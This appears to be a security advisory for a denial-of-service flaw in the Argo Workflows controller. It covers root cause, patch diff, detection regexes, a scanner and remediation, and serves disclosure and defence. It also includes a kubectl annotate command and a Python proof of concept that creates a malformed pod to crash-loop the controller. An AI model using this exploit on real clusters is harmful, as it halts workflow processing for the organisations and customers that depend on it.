CVE-2026-40886: Argo Workflows Controller Crash Loop via Malformed Pod Annotation
An unchecked array index in podGCFromPod() causes a controller-wide panic when processing a malformed pod-gc-strategy annotation, enabling a persistent crash loop that halts all workflow processing.
# A Single Bad Workflow Can Crash Your Entire System
Argo Workflows is software that companies use to run automated tasks in the cloud — think of it like a robot that executes your to-do list. But a newly discovered flaw lets someone sabotage that robot with a single poisoned instruction.
Here's the problem in plain terms: The software checks a special instruction label on workflow tasks, but it doesn't properly verify that the instruction is valid before reading it. When someone adds a deliberately broken instruction, the software tries to process it anyway, crashes, and takes the entire system down with it.
It's like a vending machine that doesn't check if the item number you enter actually exists — instead of safely saying "that doesn't exist," it just breaks.
Who's at risk? Companies using Argo Workflows versions 3.6.5 through 4.0.4 on Kubernetes clusters (a popular cloud platform). Specifically: teams where people can create or modify workflow tasks, whether that's internal employees or outside contractors. If you work for a company running these systems, any person with task-creation access could potentially crash your workflow engine.
Why does this matter? If the system goes down, automated jobs stop running — which might mean delayed data processing, halted deployments, or interrupted services that customers rely on.
What to do about it:
First, check your Argo Workflows version and update to 4.0.5 or later immediately if you're affected.
Second, restrict who can create or modify workflow tasks — treat this permission like access to critical systems.
Third, monitor your system logs for crashes and have a plan to quickly restart the workflow engine if needed.
Want the full technical analysis? Click "Technical" above.
CVE-2026-40886 is a denial-of-service vulnerability in Argo Workflows' workflow controller, affecting versions 3.6.5 through 4.0.4. A malformed workflows.argoproj.io/pod-gc-strategy annotation on any pod visible to the controller triggers an unchecked array index dereference inside the pod informer's podGCFromPod() function. Because this code executes inside an informer goroutine that runs outside the controller's top-level recover() scope, the resulting panic propagates uncaught and terminates the entire controller process.
The poisoned pod persists in etcd across controller restarts. Every restart re-lists the pod, re-triggers the panic, and crashes again — a deterministic crash loop that completely halts all workflow scheduling until an operator manually deletes the offending pod. CVSS 7.7 HIGH reflects the zero-interaction, persistent, full-service-disruption impact against a multi-tenant orchestration plane.
Root cause:podGCFromPod() splits the pod-gc-strategy annotation value by comma and directly indexes the resulting slice at position [1] without first checking that the slice contains at least two elements, causing an out-of-bounds panic inside an unrecovered informer goroutine.
The controller registers a shared informer over all pods in its watched namespaces. On each AddFunc or UpdateFunc event the informer dispatches to handler code that eventually calls podGCFromPod() to extract GC strategy metadata from pod annotations. The function splits the annotation value on "," and immediately dereferences index [1]:
// Reconstructed Go pseudocode — workflow/controller/pod_gc.go
// Real function: podGCFromPod()
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
annotations := pod.GetAnnotations()
strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
if !ok {
return nil
}
// strategyAnnotation format expected: ","
// e.g. "OnPodCompletion,30s"
parts := strings.Split(strategyAnnotation, ",")
// BUG: no bounds check before indexing parts[1]
// If annotation is "OnPodCompletion" (no comma), len(parts)==1
// and parts[1] causes: runtime error: index out of range [1] with length 1
strategy := wfv1.PodGCStrategy(parts[0])
deleteDelay := parts[1] // <-- PANIC HERE if len(parts) < 2
duration, err := time.ParseDuration(deleteDelay)
if err != nil {
return nil
}
return &wfv1.PodGC{
Strategy: strategy,
DeleteDelayDuration: &metav1.Duration{Duration: duration},
}
}
The critical framing here is where this code runs. Pod informer callbacks fire in a goroutine managed by client-go's SharedIndexInformer. The workflow controller wraps its main reconciliation loop in a recover() block, but informer event handlers run in a separate goroutine with no such recovery. A panic there propagates to the Go runtime's unhandled-panic path and calls os.Exit(2).
GOROUTINE STACK AT PANIC (reconstructed from crash log):
goroutine 47 [running]:
runtime/debug.Stack()
/usr/local/go/src/runtime/debug/stack.go:24
runtime.gopanic(0xc000a1e380)
/usr/local/go/src/runtime/panic.go:914
runtime.goPanicIndex(0x1, 0x1) // index=1, len=1
/usr/local/go/src/runtime/panic.go:113
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
workflow/controller/pod_gc.go:58
github.com/argoproj/argo-workflows/v3/workflow/controller.(*WorkflowController).podInformerHandler.func2(...)
workflow/controller/informer.go:214
k8s.io/client-go/tools/cache.(*processorListener).run(...)
vendor/k8s.io/client-go/tools/cache/shared_informer.go:911
// NOTE: no recover() frame anywhere in this call stack.
// The controller's main recover() lives in a *different* goroutine.
Exploitation Mechanics
EXPLOIT CHAIN:
1. PRECONDITION: Attacker has any write access to pod annotations in a namespace
watched by the target Argo Workflows controller. This includes:
- Direct kubectl patch access (misconfigured RBAC)
- Any admission webhook bypass
- A compromised workload pod with projected ServiceAccount token
scoped to pod/patch
2. CRAFT MALFORMED ANNOTATION:
Annotate any existing pod (even completed, non-Argo pods if controller
watches cluster-wide) with:
kubectl annotate pod \
workflows.argoproj.io/pod-gc-strategy="OnPodCompletion"
--overwrite
The annotation intentionally omits the comma-delimited duration field.
Any single-segment string (no comma) triggers len(parts)==1.
3. TRIGGER:
The annotation write generates a MODIFIED event on the pod watch stream.
client-go delivers this event to the informer's UpdateFunc handler within
milliseconds. podGCFromPod() is invoked, hits parts[1], panics.
4. CONTROLLER CRASHES:
Go runtime prints panic trace to stderr, calls os.Exit(2).
Kubernetes restarts the controller pod per its restartPolicy.
5. CRASH LOOP:
On startup, the controller performs a full re-list of all pods via
LIST+WATCH. The poisoned pod is returned in the LIST response.
AddFunc fires. podGCFromPod() panics again. Controller crashes again.
CrashLoopBackOff within 3-4 restart cycles.
6. IMPACT:
All workflow scheduling, step execution, and pod lifecycle management
halts. Existing running pods continue until their own TTL but no new
work is dispatched. Recovery requires manual deletion of the poisoned
pod by a cluster operator with pod/delete permissions.
An attacker can also craft an entirely new pod (rather than annotating an existing one) via the Kubernetes API if they have pods/create in any watched namespace — embedding the malformed annotation at creation time. This requires no existing Argo Workflows infrastructure and no workflow submission permissions.
# PoC: craft poisoned pod manifest
import yaml, subprocess
poisoned_pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": "gc-poison-poc",
"namespace": "argo",
"annotations": {
# Single token, no comma: len(strings.Split(v, ",")) == 1
# parts[1] -> runtime: index out of range [1] with length 1
"workflows.argoproj.io/pod-gc-strategy": "OnPodCompletion"
}
},
"spec": {
"containers": [{
"name": "pause",
"image": "gcr.io/google_containers/pause:3.1",
}],
"restartPolicy": "Never"
}
}
manifest = yaml.dump(poisoned_pod)
subprocess.run(["kubectl", "apply", "-f", "-"], input=manifest.encode(), check=True)
print("[+] Poisoned pod submitted. Controller crash expected within ~2s.")
print("[+] Delete pod with: kubectl delete pod gc-poison-poc -n argo")
print("[+] Until deleted, controller remains in CrashLoopBackOff.")
Memory Layout
This is a Go runtime panic rather than a traditional heap/stack memory corruption — the "memory" of interest is the Go slice header and the runtime's OOB detection machinery:
SLICE STATE AT PANIC POINT:
strings.Split("OnPodCompletion", ",") returns:
parts (slice header on goroutine stack):
┌─────────────────────────────────────────────────┐
│ ptr → [ "OnPodCompletion\x00" ] @ 0xc0004f2180 │ // backing array
│ len = 0x0000000000000001 (1 element) │
│ cap = 0x0000000000000001 │
└─────────────────────────────────────────────────┘
ACCESS ATTEMPTED:
parts[1] → index 1 into slice of length 1
Go runtime bounds check (generated by compiler at call site):
CMPQ CX, $0x1 // CX = requested index (1)
JBE runtime.goPanicIndex
// len=1, index=1: 1 >= 1 → PANIC
GOROUTINE STATE AFTER PANIC:
[goroutine 47 — informer processorListener.run()]
status: dead (panic propagated, no recover frame)
[goroutine 1 — controller main loop]
status: also dead — os.Exit(2) called by runtime
All other goroutines: terminated by os.Exit(2)
Process exit code: 2
Patch Analysis
The fix in 4.0.5 / 3.7.14 adds an explicit bounds check on parts before any index dereference, and additionally validates that the strategy token is a known valid value before attempting duration parsing:
// BEFORE (vulnerable) — workflow/controller/pod_gc.go ~line 55
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
if !ok {
return nil
}
parts := strings.Split(strategyAnnotation, ",")
// BUG: unconditional index into potentially length-1 slice
strategy := wfv1.PodGCStrategy(parts[0])
deleteDelay := parts[1] // panic if no comma in annotation
duration, _ := time.ParseDuration(deleteDelay)
return &wfv1.PodGC{Strategy: strategy, DeleteDelayDuration: &metav1.Duration{Duration: duration}}
}
// AFTER (patched) — workflow/controller/pod_gc.go
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
if !ok {
return nil
}
parts := strings.Split(strategyAnnotation, ",")
// FIX: guard on slice length before indexing parts[1]
if len(parts) < 2 {
// Malformed or legacy annotation with no duration component.
// Log and return nil rather than panicking.
log.WithField("annotation", strategyAnnotation).
Warn("malformed pod-gc-strategy annotation: missing delete delay, ignoring")
return nil
}
strategy := wfv1.PodGCStrategy(parts[0])
deleteDelay := parts[1] // safe: len(parts) >= 2 guaranteed above
duration, err := time.ParseDuration(deleteDelay)
if err != nil {
log.WithError(err).Warn("invalid pod-gc delete delay duration, ignoring")
return nil
}
return &wfv1.PodGC{
Strategy: strategy,
DeleteDelayDuration: &metav1.Duration{Duration: duration},
}
}
The patch is intentionally conservative: rather than attempting to salvage a partial annotation, it returns nil (no GC config) and logs a warning. This means a malformed annotation silently disables pod GC for that pod rather than crashing the controller — an appropriate graceful degradation for a metadata parsing path.
A secondary hardening added in the same commit moves the annotation parsing for all pod lifecycle annotations into a shared validation helper that is called during pod admission by the controller's webhook, rejecting malformed annotations before they can reach the informer path at all.
Detection and Indicators
The following signals are unambiguous indicators of active exploitation or accidental triggering:
CRASH SIGNATURE IN CONTROLLER LOGS (stderr):
goroutine 47 [running]:
runtime error: index out of range [1] with length 1
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
workflow/controller/pod_gc.go:58 +0x...
KUBERNETES EVENTS:
Type Reason Object Message
Warning BackOff Pod/workflow-controller-xxxxx Back-off restarting failed container
Normal Killing Pod/workflow-controller-xxxxx Stopping container workflow-controller
PROMETHEUS METRICS (if scrape window catches pre-crash):
# Controller restart counter incrementing rapidly
process_start_time_seconds{job="argo-workflows"} — monotonically decreasing timestamp gap
AUDIT LOG — identify the poisoning event:
verb: "patch" OR "create"
resource: "pods"
annotations containing: "workflows.argoproj.io/pod-gc-strategy"
annotation value NOT matching regex: ^[A-Za-z]+,[0-9]+(s|m|h)$
To find poisoned pods currently in a cluster before upgrading:
# Scan all pods for malformed pod-gc-strategy annotations
import subprocess, json, re
ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")
pods = json.loads(subprocess.check_output(
["kubectl", "get", "pods", "--all-namespaces", "-o", "json"]
))
for pod in pods["items"]:
ann = pod["metadata"].get("annotations", {})
if ANNOTATION in ann:
val = ann[ANNOTATION]
if not VALID.match(val):
ns = pod["metadata"]["namespace"]
name = pod["metadata"]["name"]
print(f"[POISONED] {ns}/{name} annotation='{val}'")
Remediation
Immediate: Upgrade to Argo Workflows 4.0.5 or 3.7.14. These are the only complete fixes.
If upgrade is blocked: Run the scanner above and delete any pods carrying malformed workflows.argoproj.io/pod-gc-strategy annotations. This will break the crash loop but does not address the underlying code defect — a newly submitted malformed annotation will re-trigger the panic.
RBAC hardening: Restrict pods/patch and pods/annotate permissions. No workload should require the ability to write workflows.argoproj.io/* annotations to arbitrary pods. Audit your ClusterRoleBindings for overly broad pods: ["*"] grants.
OPA/Kyverno policy: Deploy a validating admission webhook that enforces the format /^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$/ on workflows.argoproj.io/pod-gc-strategy before any pod reaches etcd. This provides defense-in-depth regardless of controller version.
Monitoring: Alert on workflow-controller pod restart rate > 2 in 5 minutes — this pattern is essentially diagnostic for this specific vulnerability in affected version ranges.